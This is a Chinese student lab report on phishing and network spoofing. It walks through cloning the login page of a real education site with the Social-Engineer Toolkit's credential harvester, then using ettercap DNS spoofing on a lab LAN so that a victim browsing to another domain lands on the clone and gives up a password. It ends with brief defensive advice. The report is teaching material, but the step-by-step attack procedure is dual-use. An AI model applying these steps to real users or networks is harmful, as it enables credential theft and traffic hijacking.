Exp7 网络欺诈防范
一、实验内容
1、简单应用SET工具建立冒名网站
2、ettercap DNS spoof
3、结合应用两种技术,用DNS spoof引导特定访问到冒名网站。
二、实验步骤
(一)、简单应用SET工具建立冒名网站
1、 sudo vi /etc/apache2/ports.conf 修改Apache的端口文件,将端口改为80
2、 netstat -tupln |grep 80 查看80端口是否被占用,如果有结束该进程 kill+进程号
3、 apachectl start 开启Apache服务
4、 setoolkit 打开SET工具
5、选择1:Social-Engineering Attacks(社会工程学攻击)
6、选择2:Website Attack Vectors(钓鱼网站攻击向量 )
7、选择3:Credential Harvester Attack Method(登录密码截取攻击)
8、选择2:Site Cloner(进行克隆网站)
9、输入攻击机ip:192.168.227.128
10、输入被克隆的网址:www.mosoteach.cn
11、提示时输入y
12、在靶机浏览器上输入攻击机ip,登录
13、可以看见输入的账户密码
(二)、ettercap DNS spoof
1、 ifconfig eth0 promisc 将卡里网卡模式改为混杂模式
2、 vi /etc/ettercap/etter.dns 修改DNS缓存表
3、 ettercap -G 开启ettercap
4、设置Primary interface为eth0
5、点击√开始扫描
6、点击搜索框扫描同网段下活跃主机
7、点击图示2查看活跃主机
8、选中网关地址:192.168.227.2,点击Add to Target 1
9、选中靶机地址:192.168.227130,点击Add to Target 2
10、点击工具栏中省略号图标,“Plugins”下 “Manage the plugins”
11、选中dns_spoof(DNS欺骗的插件)
12、靶机: ping www.mosoteach.cn
(三)、结合应用两种技术,用DNS spoof引导特定访问到冒名网站
1、综合以上两种方法首先按照(一)的步骤克隆最后要访问的网站(我的是www.mosoteach.cn)
2、按照(二)的步骤这里修改DNS表添加 www.cnblogs.com A 192.168.227.128 ,其他步骤一样
3、在靶机浏览器进入网址www.cnblogs.com(其实打开的是蓝墨云,我的靶机是windows xp 英文版所以网页显示不全)
三、基础问题回答
1、通常在什么场景下容易受到DNS spoof攻击
答:使用公共场合下的无密码WiFi浏览网页
2、在日常生活工作中如何防范以上两攻击方法
答:1)不要随便使用公共场合下的无密码WiFi
2)安装最新的入侵检测系统
3)浏览网页查看其证书
四、实验体会
本次实验总体操作难度不大,但是教育意义挺大的。通过本次实验首先了解到了钓鱼网站的基本原理,让我更清晰的认识到钓鱼网站的可怕之处,当你以为这是一个正常的网站时,就很容易受骗丢失自己的重要信息。所以我们一定要加强防范意识,防止受到侵害。